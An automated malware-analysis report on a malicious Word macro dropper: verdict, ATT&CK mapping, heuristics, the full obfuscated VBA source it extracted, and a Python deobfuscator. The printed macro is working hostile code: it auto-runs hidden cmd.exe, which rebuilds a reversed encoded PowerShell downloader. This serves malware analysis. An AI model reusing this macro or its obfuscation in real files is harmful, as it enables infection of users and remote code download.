Verdict: MALICIOUS
Risk score: 310

Malware Insights

MITRE ATT&CK:
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
The sample contains VBA macros with critical findings for WScript.Shell usage: the AutoOpen routine (module umJJFLVjtf) calls CreateObject("WScript.Shell").Run, so the command executes as soon as the document is opened with macros enabled, and the window-style argument evaluates to 0 (342822333 - 342822333), so it runs hidden. The command string is assembled from dozens of short literals joined by concatenation across five functions (LDVErTJs, QqtwSndqsl, zIUGwiLHwk, zzaRRzYGrvE, TIESXJwZMs); the interleaved "Error n * name" statements are junk that never raises because every routine starts with On Error Resume Next, and the quote character and leading letter come from Chr(2 + 3 + 2 + 1 + 26) = Chr(34) and ChrW(3 + 5 + 9 + 11 + 39) = ChrW(67). Four further names in the Run argument (FRqPWUVUfbaE, rizjmazzZPXBF, Yanrjzf, uBiIiVEfczn) are never assigned, so they are Empty and contribute nothing. Removing the caret (^) escapes, which cmd.exe discards, leaves a command of the form

Cmd /v:ON /c "SeT AK=<966-character string>& FoR /L %9 iN (965, -1, 0) dO SEt GFr1=!GFr1!!AK:~%9,1!& iF %9 LsS 1 cAlL %GFr1:~-966%"

The string stored in AK is the real command written backwards: with delayed expansion (/v:ON) the FOR /L loop copies it one character at a time from the last index to the first, and CALL then executes the rebuilt text. The stored string ends in "...UAMHACBAJ e- llehsrewop", so the rebuilt command begins "powershell -e JABCAHMAUQA9AG4A...", i.e. PowerShell with an -EncodedCommand (base64 of UTF-16LE text). Decoding the leading fragments of that base64 by hand gives "$BsQ=new-object Net.WebClient;$ipU='http://..." which is a WebClient downloader; the remainder of the encoded script, including the download URL list and the execution step, is not decoded in this report. That construction (hidden cmd.exe, reversed caret-obfuscated string, encoded PowerShell WebClient stage) matches the ClamAV classification 'Doc.Dropper.Valyria-6668024-0'. Two caveats on the heuristics below: the 'Legacy WordBasic auto-exec macro marker' rule reports that no modern VBA project was recovered, yet a 9947-byte VBA module was extracted (macros.bas), so that finding duplicates the AutoOpen result rather than adding independent evidence; and ClamAV reports no match on the extracted macro text itself, so the Valyria detection applies to the document as a whole.
Heuristics (10)

- ClamAV: Doc.Dropper.Valyria-6668024-0 [critical; CLAMAV_DETECTION]. ClamAV detected this file as malware: Doc.Dropper.Valyria-6668024-0.
- VBA macros detected [medium; OLE_VBA_MACROS; 4 related findings]. Document contains VBA macro code.
- WScript.Shell usage [critical; OLE_VBA_WSCRIPT]. Matched line in script (inside AutoOpen, preceded by a junk Error line):
  Error 62513 * zIacKW * 89634 * zpsut
  bwdnukzCO = CreateObject("WScript.Shell") _ . _
- CreateObject call [high; OLE_VBA_CREATEOBJ]. Matched line in script: the same CreateObject("WScript.Shell") statement as above.
- VBA p-code auto-exec with execution tokens [high; OLE_VBA_PCODE_AUTOEXEC_EXEC]. Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low; OLE_VBA_AUTOOPEN]. Matched line in script:
  Attribute VB_Name = "umJJFLVjtf"
  Sub AutoOpen()
  On Error Resume Next
- Reference to Windows Script Host [high; SC_STR_WSCRIPT].
- Legacy WordBasic auto-exec macro marker [medium; OLE_LEGACY_WORDBASIC_AUTOEXEC]. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [medium; EXTRACTED_FILE_STATIC_TRIAGE]. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info; EMBEDDED_URL]. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that Office writes into drawing markup; it is not a network indicator and should not be treated as a download or C2 address.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9947 bytes |

SHA-256: ecbae76d2e6e6c02351fb90b8e699b43da038709685fee2d7d3dcfb970b5daef
Detection (ClamAV, on the extracted macro source): No threats found. The Doc.Dropper.Valyria signature above fired on the document itself; the decoded VBA text is not signature-matched on its own.
Obfuscation or payload: likely. 144 of 228 identifiers look randomly generated (e.g. 'rizjmazzZPXBF'); 3 string-concatenation chain(s), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "EaQtQvZi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "GjWCjJazapR"
Function LDVErTJs()
On Error Resume Next
Error 61956 * JuKbbO
ERirvVifR = "md /v^:" + "^ON^ " + " ^ /c" + Chr(2 + 3 + 2 + 1 + 26) + " " + " ^Se" + "^T ^" + " A^K=A" + "^ACA^gA"
Error 63986 * XMDXTr * JOwzq * fAnwYw
Error 69710 * FJwJcM
Error 98572 / ZWPJwP * JLoVuj * 88844
PohwL = "A^I^A^" + "ACA^g" + "A^A" + "^" + "I^A^" + "AC^A^g" + "AAIA^AC" + "Ag^A^A" + "I^A"
Error VwwJY / wRPYz
Error 59505 / nQfBiM * 60174 * uZJPH
Error 28808 * YTRVC
Error OmKOz / Ojvzl / iwXoCi / UHzwhr
zipYfEisavJ = "^A" + "CA" + "^gAA^I" + "^" + "A^ACAg" + "AQfA0" + "^H"
Error sOSVlj / AfOrL / 6800 / OpdXS
rZfdh = "^A7^B" + "A^a^AMG" + "^" + "A0" + "^BQ^" + "Y^A" + "M^GA9" + "^B^w" + "^" + "O^"
Error OvdLR * SOXPR
Error 65437 / oNckfI
Error 15981 * vsrPJ
Error zEoOl * LFzrVS
Error NMoCZ / aPfnKP
GnSRoCl = "As^GAh" + "^B^" + "QZ" + "^A" + "^I" + "^HA" + "iBwOA"
Error wdjVf / ZBDWAD
Error MhMrGL / UPPtL / 86036 * sSDDVs
Error 6796 / iDYXGz
Error 48523 / dIwRP / 91359 / HItzPI
iaiZbFMr = "c^EAC" + "^B^A^aA" + "^QC^A^g" + "^A^" + "QbA^UG" + "^" + "A^0B^"
Error 42760 / 42038
Error mIYsv / DjVKu
Error 38882 * iDGPYT * fcHXiI * jAJQki
Error kASBP / 76484 * BWjFHP * wLmBHb
Error 51500 / iTSRLj * BwoTi / 6558
WOCzK = "QSA^0CA" + "lBw" + "aA" + "8GA^" + "2B^gb" + "^AkEA" + "^7" + "A^QKA" + "c^E" + "^AC^" + "B^A"
Error GTwssa / ZYXSL * PinoE / ptLFT
Error BlfMil / qMRjk
ijScjYC = "^a^A" + "QC^A" + "^gAA" + "LAU" + "^EA" + "jBw^Q^A" + "^QC^A^o" + "A" + "QZA" + "^" + "wG^A" + "^p^B" + "g"
Error jOMiw / 10817
Error JhRNJ * 79011 * 91113 * dUGZj
Error pjuUC * EEpKZ
fHPOjAh = "R^AQG^A" + "h^Bwb^" + "A" + "wGAu" + "^B^w^d^" + "A8^G^"
Error kZhjlV / QYGBQD
aRqYfOkYPUi = "AE^B^g^" + "L^AE^F" + "^A^zBg" + "QAQ" + "CA7" + "^" + "BQ" + "^e"
Error 16696 * jpBWB * kSjFd / CkizUs
Error 48150 * 86765
Error hZIoT * Mznjlp
wwQzBBZzwcH = "^AI^H^A" + "0^B" + "we^A^kC" + "^A" + "V"
Error jWwNB * BnVVW
Error OVjfoQ / ztPQj
Error 14707 / vQvKCw
iCQofJ = "^BAcA" + "k^GA^k" + "A^A^I" + "A^4^GAp" + "^" + "B^" + "AI^A" + "U^E^A^j" + "B^w^" + "QA^QC^"
LDVErTJs = ERirvVifR + PohwL + zipYfEisavJ + rZfdh + GnSRoCl + iaiZbFMr + WOCzK + ijScjYC + fHPOjAh + aRqYfOkYPUi + wwQzBBZzwcH + iCQofJ
Error fsHflm / zTdjS
Error BEaYq / fhiIM
Error aMQkF * 94870
End Function
Function QqtwSndqsl()
On Error Resume Next
Error 91240 / 17037
Error GwTMu / XwKtF * aSRzzO * TthslC
Error 58912 * qGFvl
jjjUQYa = "A^o^A^" + "AaA^M" + "G^A" + "^hB^Q^" + "Z" + "^AIHA" + "v^BgZA" + "^s^D" + "An^A^Q" + "Z^A^g"
Error MVkkp / ujGoKm
Error 6199 * lPtJG
Error 18592 * jJVSZ / hKBtC * EnKqO
Error lciOi * mLfNi / 85050 * 78523
BYcqNEp = "^H^A^" + "lB^g^" + "LAcC" + "^Ar^A^" + "Q" + "dA" + "sGA" + "H^"
Error rmjqsv / vCZYaC * 90121 / RmsCwS
hGWBi = "BA^JAs" + "C^AnA^A" + "^X^Ac" + "CAr" + "^Aw^Y^" + "A^kG" + "^A^sB^g" + "Y^" + "AU"
Error 54970 * OYaUa * GRvWrQ / SjPnpP
FrjBTr = "HA^w^B" + "g" + "O^" + "A^Y" + "^H^A^u" + "^B^" + "Q^Z^A^Q"
Error 43090 * YbWNcO
Error 82059 * HpiWY * cZRJHX * AqaSj
Error 21890 * 96615
TPlRzccvu = "C" + "^A^9A^" + "wRA^IEA" + "^oB" + "^" + "A^JAs" + "D" + "^AnAwN" + "AA" + "D^A3" + "^AwJ" + "A" + "ACA"
Error afnJi / fbmRlp * hYnnH / rirkmF
Error wJfGd / dSYzV * tBqXo * XUioB
Error 85542 * CtDmiC * jRJGoM * MNppSP
ovDJUidM = "9^AA^IA" + "^U^H^Ar" + "BwRA^Q" + "CA^7A^Q" + "K^A" + "c"
Error SHLIas * AoSni
Error 84172 / vjiUn * Hcvpn * jdwRbb
Error 75745 / pjvADs
dSNWk = "CA^A" + "B" + "wJA" + "^gCA^0" + "BQaA^wG" + "Aw^B^w^" + "U^A4C^" + "AnA" + "^" + "QR^A"
Error duzcQ * MjXFkw / zQVXi / KiQSn
suXVJjjjit = "^8C^" + "A1^" + "Bgc^A^" + "4C" + "^A^yB" + "^A^d^" + "Ak^" + "GA" + "^" + "i^" + "B^" + "gc^A^E^" + "GAzBwc^"
Error 41446 / sXkCpT / hwEwwN / NbKYkQ
Error LwOiLh / kfGBOl
Error qALGW / ESpks
Error 9774 * JLloL
Error 65943 / OLtIDH * 18561 / FTEOaU
IiRvd = "A" + "^UG" + "Au^BQ^a" + "AM^H^A" + "^1^Bg^Y" + "^A^"
QqtwSndqsl = jjjUQYa + BYcqNEp + hGWBi + FrjBTr + TPlRzccvu + ovDJUidM + dSNWk + suXVJjjjit + IiRvd
Error 18382 / WNfEo / ZscMJL * wpcjw
Error 6532 / zBriT * GTjVBK / iMiHw
Error 13347 / Yquzz * 40345 * 86540
End Function
Function zIUGwiLHwk()
On Error Resume Next
Error owcGV * 48830
Error 30208 / uDNVz
ZujQZtakwz = "8CAv^A^" + "g^" + "O^A" + "A" + "HA^0B" + "A^d^A^g" + "G^A^AB" + "^wV^A" + "cD^AN^B" + "Q" + "cA^" + "4E"
Error 99176 / RndHoV / iwwvZY / 8631
Error izPYf / sPJMwq
Error 17400 / 2231
Error VISYs * IAGOcw
Error oiwEzA / ZWbzR / vPFbHm / EzwBD
Error brTrbE * NOihYP
AUnvbHHFcXo = "^A" + "O" + "Bw" + "^L^A0G" + "A" + "v^BwY^" + "A4CAhB^" + "AZA^k"
Error 11225 / dYbql / 88835 * GspaH
Error 35404 / PdmKRz
blzYBKzcNvA = "GA" + "yBwb" + "Aw^G^" + "A^mB^gZ" + "^" + "A8GA^5B" + "^AdA" + "^w" + "GAh"
Error AhYQiq * VJHCDQ
Error 45911 / vkuOs * LLwSlt / bzdEpq
Error 79976 * jGsiRz
OJVmWlK = "BQ^Z" + "^AIH^Ak" + "^B" + "gb^A^E" + "G^As^Bw" + "c" + "AkG" + "^"
Error bHiZih * FtKVM / 37913 * FqkiH
Error biTwKM * IosPwK
Error 70567 * BFEzw
Error 56797 * LsSXw * 90862 / iJQGwP
ikokzXurlv = "As^" + "B" + "^Q" + "Y^AMG^" + "A" + "pBAc" + "^" + "A^8G^" + "AyBAdA8" + "CAvA^g^" + "OA^AH^A"
zIUGwiLHwk = ZujQZtakwz + AUnvbHHFcXo + blzYBKzcNvA + OJVmWlK + ikokzXurlv
Error qnAYOd * 46279 * 39703 / zFSGQ
Error 49622 / fZpoAA
Error lntFw / VcZGWq
End Function
Function zzaRRzYGrvE()
On Error Resume Next
Error UzKBpM / tHjUkt
Error 575 * mUVdpi
CBDCnna = "0^B^A" + "^dA" + "gG" + "^A" + "A^B^A^d" + "AA^" + "F" + "AyA" + "^g^YA" + "^k^G" + "A^y^A^w" + "L^A^4^"
Error nHtCM * PzfIvC
Error 85254 * iuzEWv * VzzBBE / 17355
Error 76156 * iTvrpo
Error kqjJm / XisVrq
Error 81929 * JumYcI / 53718 * ZQkWj
WPfqAJl = "G^A" + "^pB^g" + "LA^" + "E^G" + "A" + "p^"
Error 86673 / Bwioq
Error KQbfH * 51481
Error 31734 / wsFzw
KvVEnmj = "B^g" + "cA8" + "^G^A^tB" + "^Q^Z^A0" + "^GAhB" + "AbA8CA" + "vA^gO" + "AAHA0" + "BA^dA^g" + "^G" + "^"
Error 49015 * NLBwt
Error lBYAD * rJFkbO
Error hpqbFT / QChPpA / 79846 * aUzqVV
MztiUtni = "A^A^" + "B^" + "wb" + "Aw^E^A^" + "u^BQN" + "^A^8" + "CArBAb^" + "A^4"
Error XqKktm * tcFkYt
Error wNOszO * RbUwr
Error 26836 * 71140 / WfQdY / SIQaOu
ofAvitQq = "CA^5^B" + "Q^" + "b^AU" + "^GA^kBQ" + "Y^A^M" + "GA^h^B"
Error 33391 / hwOUTL
Error izawZN * 91785 * FIvFcW * 885
Error qzIjAU / bdCKtz
VbHHfwPAG = "^wY^A" + "YH^A" + "u^" + "AAb^A^k" + "^G" + "^AhB^Q" + "bA" + "^8C^Av^" + "AgO^" + "A^AH^" + "A0BA^"
Error fkqVQ * 12135
DWVAVHV = "d^A^gGA" + "^A^B^A" + "NA^8C" + "A^u" + "^BwY" + "A4"
Error DDSBdi * XwLlzF / 28485 * XuZmzf
Error 77324 / PVkHF
pVPUIF = "C^A1" + "B^g^Z^" + "A^4" + "^" + "G^"
Error 46923 / YQIOHC / 8515 / OpDwvO
Error rQlHi / wJuJo
Error bZqOP * SjtvPw * 18869 / ZVMwV
Error UuYPF / IuUSjO
HFcdRWNN = "Ah^B^Q" + "^aA^QHA" + "^jBg^Y" + "A" + "^4C" + "An^Bwb^" + "AwG" + "^AiB^w^" + "LA^8C^A" + "^6A" + "AcA" + "^"
zzaRRzYGrvE = CBDCnna + WPfqAJl + KvVEnmj + MztiUtni + ofAvitQq + VbHHfwPAG + DWVAVHV + pVPUIF + HFcdRWNN
Error jdstzw * HZQPLK / CnNfZ * swtQB
End Function
Function TIESXJwZMs()
On Error Resume Next
Error qfrnbD / EcTchK
Error UzNfGh * ZFCRw
Error 69208 / VrTHZH * 13801 / JzRolj
ENmmrLp = "Q" + "H^A" + "0^B" + "Aa^AcC" + "A9A^Q" + "VAA^" + "H^A^p^B" + "AJA^" + "sDA0^B" + "gbA^" + "UG"
Error pdJaS / wPSHO
Error 3193 / bwEPjw * DBnIUL * GRSUlL
Error 12305 * ZluYXj
Error IHYZhz / qMAEfo
Error 21600 * 5090 / 20971 / 83317
dJQbsEdHtj = "A^p^B" + "^AbA^" + "M^" + "E" + "^A" + "i"
Error HrVkHQ / VmEks * CqnMo * wWIJcC
Error GRMqi * 52505 * 97615 * iXWoTC
WzFYj = "B" + "Q" + "Z^" + "Ac^F^" + "AuA" + "Ad^A^U" + "^G^" + "A" + "^O" + "^BA" + "I^"
Error 68198 / iEAYwh / 87600 * DnFjiR
Error 46395 / ZWVimI / 69790 * FjlvrB
Error 94675 * DmPTYd * RdCqO * DZqGMc
troXQfk = "A^Q^H" + "AjB^" + "QZAoGA" + "^i^" + "B^w^b" + "A0C^A" + "3B^Q^" + "Z" + "^" + "A4GA" + "9A^QUA" + "MHA"
Error ssvPt / wHmLmp
Error JJEzu / znnFbV / cQNczE * jPPEGl
Error 54223 * LTzfm * vzCIK / HViOD
Error 31026 * nQTiN * 95401 * iQJbP
KBNoOtVjHPm = "C^B^" + "AJ^ ^" + "e- l" + "le" + "^h^sr" + "^e" + "wop" + "&"
Error oXIVqY / 67615 * 77408 / kXuuAr
hKPolnFPG = "& ^" + "F" + "^oR /^L" + " %^9 " + "^iN" + " " + "(^ ^" + " ^ ^9" + "65^ " + "^" + ", ^ " + "^ -1"
Error 70556 * chwqD / 32735 / ZAficE
Error 64919 * AoInWi * jLocb / KZPjdS
cDcYslr = " ," + "^ ^ " + "^0) ^d" + "O " + " ^S^E" + "t G^F" + "r" + "^"
Error lrlpXz / ItkVk
phjMCDl = "1=!G" + "^" + "Fr" + "^1!!" + "A^" + "K:~ %" + "^9, 1" + "!" + "& ^i^F " + " %^9"
Error 76382 / jdZpzT * uRWCZj / pFvFP
Error 71382 * LLPriw
Error IswMao * boEmnz * 87379 / FWjwr
HFpFP = " LsS" + " ^1 cA" + "^l^L %" + "G^" + "Fr^" + "1:^~" + "-^966" + "% " + Chr(2 + 3 + 2 + 1 + 26) + " " + ""
TIESXJwZMs = ENmmrLp + dJQbsEdHtj + WzFYj + troXQfk + KBNoOtVjHPm + hKPolnFPG + cDcYslr + phjMCDl + HFpFP
Error SwhdD / LqJvRO
Error oztIj * EltGEw
Error CUzPiB / iIsKUR
End Function
Attribute VB_Name = "umJJFLVjtf"
Sub AutoOpen()
On Error Resume Next
Error lYVKNO / Xnbns
Error WSEwz * QVzcKw / 60661 * wkirVV
Error 62513 * zIacKW * 89634 * zpsut
bwdnukzCO = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(3 + 5 + 9 + 11 + 39) + FRqPWUVUfbaE + rizjmazzZPXBF + LDVErTJs + QqtwSndqsl + zIUGwiLHwk + zzaRRzYGrvE + TIESXJwZMs + Yanrjzf + uBiIiVEfczn, 342822333 - 342822333)
Error omElG / brUPHR
End Sub
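The construction described in the summary (fragment concatenation, junk Error lines, Chr()/ChrW() arithmetic, caret escapes, the SET / FOR /L / CALL reversal, then powershell -e) can be undone mechanically. The Python below is an added worked example, not code from the report, the analyzer or the sample: it replays the VBA assignments to recover the Run argument, strips the carets as cmd.exe would, locates the reversal chain and reverses the stored string, then base64/UTF-16LE-decodes the PowerShell argument. The macro it runs on is constructed for the example; it reuses the preview's function and variable names (LDVErTJs, TIESXJwZMs, AK, GFr1) so the patterns are shown against the real spelling, but its second stage is a harmless Write-Output, not the sample's encoded script.

```python
"""Recover the command a caret-escaped, string-reversing VBA dropper hands to
WScript.Shell.Run. Added worked example, not code from the report or the sample;
the macro text below is CONSTRUCTED to mirror the preview, and its second stage
is a harmless Write-Output rather than the real encoded PowerShell."""
import base64
import re

PS_SCRIPT = "Write-Output 'stage two would run here'"        # constructed stage 2
ENCODED = base64.b64encode(PS_SCRIPT.encode("utf-16-le")).decode()
REVERSED = f"powershell -e {ENCODED}"[::-1]                   # stored backwards, like AK
CARETED = re.sub(r"(.{7})(?=.)", r"\1^", REVERSED)            # sprinkle ^ escapes
FRAGMENTS = " + ".join(f'"{CARETED[i:i + 9]}"' for i in range(0, len(CARETED), 9))
N = len(REVERSED) - 1                                         # FOR /L upper bound

SAMPLE_VBA = '''
Function LDVErTJs()
On Error Resume Next
Error 61956 * JuKbbO
ERirvVifR = "md /v^:" + "^ON^ " + " ^ /c" + Chr(2 + 3 + 2 + 1 + 26) + " " + " ^Se" + "^T ^" + " A^K="
PohwL = @FRAGMENTS@
LDVErTJs = ERirvVifR + PohwL
End Function
Function TIESXJwZMs()
KBNoOtVjHPm = "&" + " ^F" + "^oR /^L" + " %^9 " + "^iN" + " (^ @N@^ , ^ -1" + " ,^ ^0) ^d" + "O " + " ^S^E" + "t G^Fr" + "^1=!G" + "^Fr^1!!A^" + "K:~ %^9, 1" + "!& ^i^F " + " %^9"
HFpFP = " LsS" + " ^1 cA" + "^l^L %" + "G^Fr^1:^~" + "-^@M@% " + Chr(2 + 3 + 2 + 1 + 26) + " "
TIESXJwZMs = KBNoOtVjHPm + HFpFP
End Function
Sub AutoOpen()
Error 62513 * zIacKW * 89634 * zpsut
bwdnukzCO = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(3 + 5 + 9 + 11 + 39) + FRqPWUVUfbaE + LDVErTJs + TIESXJwZMs + uBiIiVEfczn, 342822333 - 342822333)
End Sub
'''.replace("@FRAGMENTS@", FRAGMENTS).replace("@N@", str(N)).replace("@M@", str(N + 1))

TOKEN = re.compile(r'"((?:[^"]|"")*)"|(Chr[W]?)\(([\d\s+]+)\)|([A-Za-z_]\w*)')
ASSIGN = re.compile(r"^(\w+)\s*=\s*(.*)$")
RUN = re.compile(r"\.\s*Run\s*\(?(.*),[^,]*$", re.I)


def vba_eval(expr, env):
    """Concatenate literals, Chr()/ChrW() of an integer sum, and variables; a name never assigned is Empty ("")."""
    out = []
    for lit, fn, arith, name in TOKEN.findall(expr):
        if fn:
            out.append(chr(sum(int(t) for t in arith.split("+"))))
        elif name:
            out.append(env.get(name, ""))
        else:
            out.append(lit.replace('""', '"'))
    return "".join(out)


def recover_command(src):
    """Replay every assignment top to bottom (junk Error lines skipped) and return the Run argument."""
    env, cmd = {}, None
    for line in re.sub(r" _\n\s*", " ", src).splitlines():   # join VBA ` _` continuations
        line = line.strip()
        m = ASSIGN.match(line)
        if line.startswith("Error ") or not m:
            continue
        name, rhs = m.groups()
        run = RUN.search(rhs)
        if run:
            cmd = vba_eval(run.group(1), env)
        else:
            env[name] = vba_eval(rhs, env)
    if cmd is None:
        raise ValueError("no WScript.Shell.Run call found")
    return cmd


# cmd.exe side: SET VAR=<text>, FOR /L copies VAR backwards into ACC, CALL runs ACC's tail
SET_VAR = re.compile(r"set\s+(\w+)=([^&]*)&", re.I)
LOOP = re.compile(r"for\s+/L\s+%(\d)\s+in\s*\(\s*(\d+)\s*,\s*-1\s*,\s*0\s*\)\s*do\s+set\s+"
                  r"(\w+)=!\3!!(\w+):~\s*%\1\s*,\s*1\s*!", re.I)
CALL = re.compile(r"call\s+%(\w+):~\s*-\s*(\d+)\s*%", re.I)
PS_ENC = re.compile(r"powershell\s+-e\w*\s+([A-Za-z0-9+/=]+)", re.I)


def undo_reversal(cmd):
    """Return the text CALL executes: VAR[0..N] reversed, last M characters."""
    s, loop, call = SET_VAR.search(cmd), LOOP.search(cmd), CALL.search(cmd)
    if not (s and loop and call) or loop.group(4) != s.group(1) or call.group(1) != loop.group(3):
        raise ValueError("no SET / FOR /L reversal / CALL chain found")
    n, m = int(loop.group(2)), int(call.group(2))
    return s.group(2)[: n + 1][::-1][-m:]


def decode_powershell(cmd):
    """powershell -e / -EncodedCommand takes base64 of UTF-16LE script text."""
    enc = PS_ENC.search(cmd)
    if not enc:
        raise ValueError("no powershell -e <base64> found")
    return base64.b64decode(enc.group(1)).decode("utf-16-le")


def deobfuscate(vba_src):
    """Return (command as cmd.exe parses it, the CALLed command, PowerShell text)."""
    cmd = recover_command(vba_src).replace("^", "")  # cmd.exe discards ^ escapes
    inner = undo_reversal(cmd)
    return cmd, inner, decode_powershell(inner)
```

Pass recover_command() the decoded source that olevba produces (macros.bas here); everything after that is string processing, so the macro and the PowerShell stage are decoded but never executed. The parser deliberately treats unassigned identifiers as Empty, which is what makes the four decoy names in the Run argument drop out.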